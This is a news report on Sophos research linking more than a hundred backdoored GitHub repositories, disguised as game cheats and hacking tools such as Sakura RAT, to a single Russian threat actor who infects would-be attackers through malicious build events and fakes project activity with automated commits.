Sophos researchers have traced more than a hundred backdoored malware repositories on GitHub to a single Russian threat actor using the identifier “ischhfd83,” who has been systematically targeting novice cybercriminals and video game cheaters seeking malicious code. The investigation began when a Sophos customer inquired about Sakura RAT, a supposedly sophisticated remote access trojan that gained attention through tech journalism and social media posts in April, only to discover it was actually a backdoored version that infected would-be attackers with additional malware.
Analysis revealed that Sakura RAT was largely copied from AsyncRAT, a widely used cybercriminal tool, but with many forms left empty to prevent proper functionality while secretly installing infostealers and other malicious software on the user’s device. The backdoor was implemented through a PreBuild event in the Visual Basic project file that silently downloaded malware during compilation. This same technique was found across 111 of the 141 repositories linked to the ischhfd83 email address, with 133 repositories containing some form of backdoor functionality targeting unsuspecting users.
The malicious repositories were carefully crafted to appear legitimate, with 58 percent marketed as video game cheats and 24 percent disguised as malware projects, exploits, or attack tools. The threat actor used GitHub Actions workflows to automate thousands of commits, with some repositories registering nearly 60,000 commits in just a few months to create the illusion of active development. However, closer inspection revealed telltale signs of the deception, including repositories with few contributors who had no projects of their own, similar usernames with minor character variations, and contributors who only worked on projects within the same network.
Sophos linked this campaign to previous research by security firms including Checkmarx, Trend Micro, Kaspersky, and Check Point, characterizing it as part of a broader distribution-as-a-service operation that has been active since at least 2022. While the exact distribution methods remain unclear, previous investigations have identified Discord and YouTube as primary channels for spreading links to these malicious GitHub projects. The campaign represents a rare example of cybercriminals targeting their own community, though researchers warn that inexperienced open source enthusiasts could easily be deceived by the automated commits and professional appearance of these repositories.